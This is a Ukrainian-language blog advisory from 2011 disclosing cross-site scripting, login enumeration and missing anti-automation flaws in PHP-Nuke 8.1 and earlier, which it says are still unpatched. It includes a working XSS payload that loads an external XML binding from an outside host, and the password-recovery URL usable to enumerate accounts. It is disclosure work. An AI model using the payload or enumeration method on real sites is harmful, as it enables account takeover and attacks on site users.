XSS, AoF та IAA уразливості в PHP-Nuke
15:21 15.04.201116.03.2011
У січні, 15.01.2011, я знайшов Cross-Site Scripting, Abuse of Functionality та Insufficient Anti-automation уразливості в PHP-Nuke. Які я виявив на офіційному сайті phpnuke.org. Про що найближчим часом повідомлю розробникам.
Раніше я вже писав про уразливості в PHP-Nuke.
Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.
15.04.2011
XSS:
POST запит на сторінці http://site/modules.php?name=Downloads
" style="-moz-binding:url('http://websecurity.com.ua/webtools/xss.xml#xss')
В полі пошуку.
Це версія для Mozilla та Firefox (до 3.0). Приклад експлоіту:
Abuse of Functionality:
http://site/modules.php?name=Your_Account&op=pass_lost
Через даний функціонал можна виявляти логіни в системі.
Insufficient Anti-automation:
Враховучи, що в даному функціоналі немає захисту від автоматизованих атак, це дозволяє проводити автоматизоване виявлення логінів в системі (а також розсилку листів користувачам сайту). В подальшому виявлені логіни можуть бути використані для визначення паролів користувачів системи.
Уразливі PHP-Nuke 8.1 та попередні версії. Дані уразливості досі не виправлені розробниками PHP-Nuke - ні в своїй системі, ні в себе на сайті.